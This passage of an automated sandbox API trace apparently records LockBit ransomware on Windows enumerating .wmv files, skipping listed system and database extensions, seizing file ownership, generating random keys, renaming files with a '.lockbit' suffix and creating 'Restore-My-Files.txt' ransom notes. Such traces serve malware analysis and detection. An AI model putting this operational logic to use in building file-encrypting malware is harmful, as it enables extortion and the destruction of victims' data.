lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.484] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.484] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv.lockbit") returned 87 [0079.484] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.485] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.486] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.486] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.486] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.486] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.486] RtlFreeAnsiString (AnsiString="\\") [0079.486] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.486] malloc (_Size=0x200) returned 0x77d800 [0079.487] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.487] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.487] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.487] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.487] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.487] CloseHandle (hObject=0x3c4) returned 1 [0079.487] free (_Block=0x77d800) [0079.487] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.488] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.488] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.488] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=181298) returned 1 [0079.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.489] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.494] malloc (_Size=0xc4) returned 0x1ff1e60 [0079.494] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0079.499] free (_Block=0x1ff1e60) [0079.499] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.499] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.500] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.500] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728f1189, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728f1189, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a058069, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c44a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bear_Formatted_MATTE2_PAL.wmv", cAlternateFileName="")) returned 1 [0079.500] lstrcmpiW (lpString1=".", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned -1 [0079.500] lstrcmpiW (lpString1="..", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned -1 [0079.500] PathFindExtensionW (pszPath="Bear_Formatted_MATTE2_PAL.wmv") returned=".wmv" [0079.500] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.500] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.501] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.501] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned 1 [0079.502] lstrcmpiW (lpString1="ntldr", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned 1 [0079.502] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned 1 [0079.502] lstrcmpiW (lpString1="bootsect.bak", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned 1 [0079.502] lstrcmpiW (lpString1="autorun.inf", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned -1 [0079.502] lstrcmpiW (lpString1="thumbs.db", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned 1 [0079.502] lstrcmpiW (lpString1="iconcache.db", lpString2="Bear_Formatted_MATTE2_PAL.wmv") returned 1 [0079.502] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.502] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned=".wmv" [0079.502] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.502] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.502] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.503] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.503] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv.lockbit") returned 91 [0079.503] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.504] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.504] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.504] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.504] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.504] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.505] RtlFreeAnsiString (AnsiString="\\") [0079.505] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.505] malloc (_Size=0x200) returned 0x77d800 [0079.505] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.505] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.505] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.505] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.505] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.506] CloseHandle (hObject=0x3c4) returned 1 [0079.506] free (_Block=0x77d800) [0079.506] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.506] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.506] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.506] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=181322) returned 1 [0079.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.507] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.514] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.514] malloc (_Size=0xcc) returned 0x1ff1e60 [0079.514] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0079.519] free (_Block=0x1ff1e60) [0079.519] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.520] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.520] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.520] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729172e6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729172e6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a351bc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39ef2, dwReserved0=0x0, dwReserved1=0x0, cFileName="bear_formatted_rgb6.wmv", cAlternateFileName="")) returned 1 [0079.520] lstrcmpiW (lpString1=".", lpString2="bear_formatted_rgb6.wmv") returned -1 [0079.520] lstrcmpiW (lpString1="..", lpString2="bear_formatted_rgb6.wmv") returned -1 [0079.520] PathFindExtensionW (pszPath="bear_formatted_rgb6.wmv") returned=".wmv" [0079.520] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.520] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.521] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.521] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="bear_formatted_rgb6.wmv") returned 1 [0079.522] lstrcmpiW (lpString1="ntldr", lpString2="bear_formatted_rgb6.wmv") returned 1 [0079.522] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="bear_formatted_rgb6.wmv") returned 1 [0079.522] lstrcmpiW (lpString1="bootsect.bak", lpString2="bear_formatted_rgb6.wmv") returned 1 [0079.522] lstrcmpiW (lpString1="autorun.inf", lpString2="bear_formatted_rgb6.wmv") returned -1 [0079.522] lstrcmpiW (lpString1="thumbs.db", lpString2="bear_formatted_rgb6.wmv") returned 1 [0079.522] lstrcmpiW (lpString1="iconcache.db", lpString2="bear_formatted_rgb6.wmv") returned 1 [0079.522] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.522] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv") returned=".wmv" [0079.522] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.522] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.522] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".dbc", 